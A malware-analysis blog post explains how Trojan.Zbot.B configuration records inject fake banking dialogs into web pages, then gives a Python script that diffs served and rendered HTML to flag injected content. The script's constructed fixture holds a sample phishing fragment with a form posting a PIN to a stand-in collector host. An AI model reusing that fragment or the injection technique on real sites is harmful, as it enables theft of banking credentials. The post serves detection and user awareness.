Following on from my previous blog exploring the structure of the Trojan.Zbot.B configuration files, we will now take a closer look at another command contained in the configuration file. In this case we will examine a command that injects HTML code into the Web browser.
This configuration block has four command records: 0010, 0020, 0004 and 0008. The command 0010 is used to search for HTML data matching this pattern:
<td><div class="account-status"> and Self Triggered Debits -->.
The next command, 0020, defines the text expression that describes how the captured HTML data is represented; %1 is a wildcard standing for the real data. The command 0004 defines the condition under which HTML injection takes place; in this sample, the HTML data is inserted after a <head> tag. The last command, 0008, defines the HTML data to be injected. The following is a snippet of the injected HTML data.
Note that the attacker uses a legitimate Ajax code library provided by Google so that they can avoid writing their own code.
The code is injected into the Web page behind the scenes and the result is then displayed to the user. In order to make the injected dialog boxes look more convincing, they also contain images and logos stolen from the various institutions. However, the URLs of the image files show that they are not hosted by the organizations to which they belong. Basically, the Trojan is “borrowing” images from various websites, and users would be none the wiser unless they looked at the underlying HTML code.
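The two observations above (content inserted after the <head> tag, and logos loaded from hosts that do not belong to the institution) are exactly what a responder can check for when comparing the HTML a site served with the HTML the browser rendered. The script below is an added example written for this post; it is not Symantec's code and not part of any Zbot sample. The page host, the bank page, the injected fragment and every URL in it are constructed placeholders.

```python
"""Compare the HTML a site served with the HTML the browser rendered and
flag material a man-in-the-browser injection could have added.

All sample data below is constructed for illustration."""
import difflib
from html.parser import HTMLParser
from urllib.parse import urlparse

PAGE_HOST = "bank.example"  # constructed: the host the victim is visiting

# Constructed: what the server sent (e.g. captured by a proxy outside the browser).
SERVED_HTML = """<html>
<head>
<title>Online Banking</title>
</head>
<body>
<td><div class="account-status">Balance: 1,234.56</div></td>
</body>
</html>"""

# Constructed: what the browser rendered on the infected machine. Directly after
# <head> a script from a public CDN and a "verification" form were inserted; the
# form's logo is fetched from a host unrelated to the bank.
RENDERED_HTML = """<html>
<head>
<script src="https://ajax-cdn.example/jquery.min.js"></script>
<div id="verify"><img src="http://free-image-host.example/bank-logo.png">
<form action="http://collector.example/post">PIN: <input name="pin"></form></div>
<title>Online Banking</title>
</head>
<body>
<td><div class="account-status">Balance: 1,234.56</div></td>
</body>
</html>"""


def injected_lines(served, rendered):
    """Return the lines that are new or changed in the rendered page.

    A line-level diff is enough here because webinjects splice whole
    fragments into the document rather than editing single characters."""
    served_lines = served.splitlines()
    rendered_lines = rendered.splitlines()
    matcher = difflib.SequenceMatcher(None, served_lines, rendered_lines)
    added = []
    for op, _i1, _i2, j1, j2 in matcher.get_opcodes():
        if op in ("insert", "replace"):
            added.extend(rendered_lines[j1:j2])
    return added


class _RefCollector(HTMLParser):
    """Collect the URLs that img/script src and form action attributes point at."""

    def __init__(self):
        super().__init__()
        self.refs = []  # list of (tag, url)

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag in ("img", "script") and attrs.get("src"):
            self.refs.append((tag, attrs["src"]))
        elif tag == "form" and attrs.get("action"):
            self.refs.append((tag, attrs["action"]))


def foreign_references(html, page_host):
    """Return (tag, url) pairs whose host is neither page_host nor a subdomain of it.

    Relative URLs have no host and are treated as first-party."""
    collector = _RefCollector()
    collector.feed(html)
    foreign = []
    for tag, url in collector.refs:
        host = urlparse(url).hostname
        if host and host != page_host and not host.endswith("." + page_host):
            foreign.append((tag, url))
    return foreign


def triage(served, rendered, page_host):
    """Summarise what changed between the two captures and where the additions point."""
    return {
        "injected": injected_lines(served, rendered),
        "foreign_refs": foreign_references(rendered, page_host),
    }


if __name__ == "__main__":
    result = triage(SERVED_HTML, RENDERED_HTML, PAGE_HOST)
    print("Lines added in the browser:")
    for line in result["injected"]:
        print("  +", line)
    print("Off-site references in the rendered page:")
    for tag, url in result["foreign_refs"]:
        print(f"  <{tag}> -> {url}")
```

Run against a served copy and a rendered copy of the same page, the diff isolates the spliced fragment, and the host check surfaces the third-party script and the logo pulled from an unrelated site, which is the clue the post describes. A script loaded from a well-known CDN is not suspicious on its own; it is the combination of unexpected additions and off-site image or form destinations on a banking page that warrants a closer look.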
If your computer is compromised by Trojan.Zbot.B and you are visiting URLs targeted by the Trojan, the browser may show a Web page or a pop-up dialog box asking you to provide some confidential information. The following images are generated from the HTML data that is injected from the configuration files:
The tell-tale sign of potential danger when transacting online is a request for excessive information, or being asked to verify access to a service by providing personal information. These are fairly good signs that the request may be bogus. Remember, no reputable financial institution will ask you to disclose the PIN of your bank card over the Internet or even by phone.
A special thanks to Andrea Lelli for his technical assistance.